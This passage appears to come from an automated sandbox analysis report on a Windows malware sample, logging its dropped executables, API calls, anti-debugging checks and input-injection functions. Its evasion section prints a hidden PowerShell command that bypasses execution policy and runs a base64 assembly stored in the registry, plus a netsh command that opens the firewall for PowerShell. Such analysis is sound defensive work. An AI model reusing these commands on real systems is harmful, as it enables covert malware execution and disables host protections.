        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 922Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3099Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1249Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2193Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1163Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: foregroundWindowGot 1776Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 920
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1002
        Source: C:\Users\user\Desktop\._cache_1.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-83066
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
        Source: C:\Users\user\Desktop\._cache_1.exeAPI coverage: 3.9 %
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeAPI coverage: 4.1 %
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeAPI coverage: 4.0 %
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3384Thread sleep time: -180000s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3388Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3380Thread sleep time: -1249000s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3380Thread sleep time: -1163000s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3388Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\netsh.exe TID: 3420Thread sleep time: -60000s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3576Thread sleep time: -60000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3580Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00B2449B GetFileAttributesW,FindFirstFileW,FindClose,1_2_00B2449B
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00B2C7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,1_2_00B2C7E8
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00B2C75D FindFirstFileW,FindClose,1_2_00B2C75D
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00B2F021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00B2F021
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00B2F17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00B2F17E
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00B2F47F FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_00B2F47F
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00B23833 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_00B23833
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00B23B56 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_00B23B56
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00B2BD48 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_00B2BD48
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_0040449B GetFileAttributesW,FindFirstFileW,FindClose,12_2_0040449B
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_0040C75D FindFirstFileW,FindClose,12_2_0040C75D
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_0040C7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,12_2_0040C7E8
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_0040F021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_0040F021
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_0040F17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_0040F17E
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_0040F47F FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,12_2_0040F47F
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_00403833 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_00403833
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_00403B56 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_00403B56
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_0040BD48 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,12_2_0040BD48
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start MenuJump to behavior
        Source: C:\Users\user\Desktop\._cache_1.exeAPI call chain: ExitProcess graph end nodegraph_0-82189
        Source: C:\Users\user\Desktop\._cache_1.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_0045A370 BlockInput,0_2_0045A370
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00AF5BFC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_00AF5BFC
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_004238DA
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_0041F250 SetUnhandledExceptionFilter,0_2_0041F250
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041A208
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00417DAA
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00AEA2A4 SetUnhandledExceptionFilter,1_2_00AEA2A4
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00AEA2D5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00AEA2D5
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_003CA2A4 SetUnhandledExceptionFilter,12_2_003CA2A4
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_003CA2D5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_003CA2D5

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null)
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_00436CD7 LogonUserW,0_2_00436CD7
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_0043333C
        Source: C:\Users\user\Desktop\._cache_1.exeProcess created: C:\Users\user\AppData\Local\Temp\Tr.exe "C:\Users\user\AppData\Local\Temp\Tr.exe" Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null)Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall add allowedprogram "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "powershell.exe" ENABLEJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null)
        Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\user\AppData\Local\Temp\Tr.exe "C:\Users\user\AppData\Local\Temp\Tr.exe" Jump to behavior
        Source: unknownProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c start /min powershell -executionpolicy bypass -windowstyle hidden -noexit -command [system.reflection.assembly]::load([system.convert]::frombase64string((get-itemproperty hkcu:\software).valuex)).entrypoint.invoke($null,$null)
        Source: unknownProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c start /min powershell -executionpolicy bypass -windowstyle hidden -noexit -command [system.reflection.assembly]::load([system.convert]::frombase64string((get-itemproperty hkcu:\software).valuex)).entrypoint.invoke($null,$null)
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00446124
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00B24A08 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,1_2_00B24A08
        Source: Tr.exe, 00000001.00000000.342399628.0000000000B74000.00000002.00000001.01000000.00000005.sdmp, Tr.exe, 0000000C.00000002.411310595.0000000000454000.00000002.00000001.01000000.00000005.sdmp, Tr.exe.0.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
        Source: powershell.exe, 00000004.00000002.880711036.000000001B7AC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.872864488.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.872864488.000000000296C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
        Source: Tr.exeBinary or memory string: Shell_TrayWnd
        Source: powershell.exe, 00000004.00000002.880078674.000000001A824000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerb
        Source: powershell.exe, 00000004.00000002.880711036.000000001B7AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Program Manager
        Source: powershell.exe, 00000004.00000002.872864488.0000000002C46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.872864488.000000000296C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager8
        Source: powershell.exe, 00000004.00000002.880711036.000000001B775000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <Program Manager
        Source: ._cache_1.exe, x.exe.0.drBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00AE87AB cpuid 1_2_00AE87AB
        Source: C:\Users\user\Desktop\._cache_1.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\._cache_1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\x.exe VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
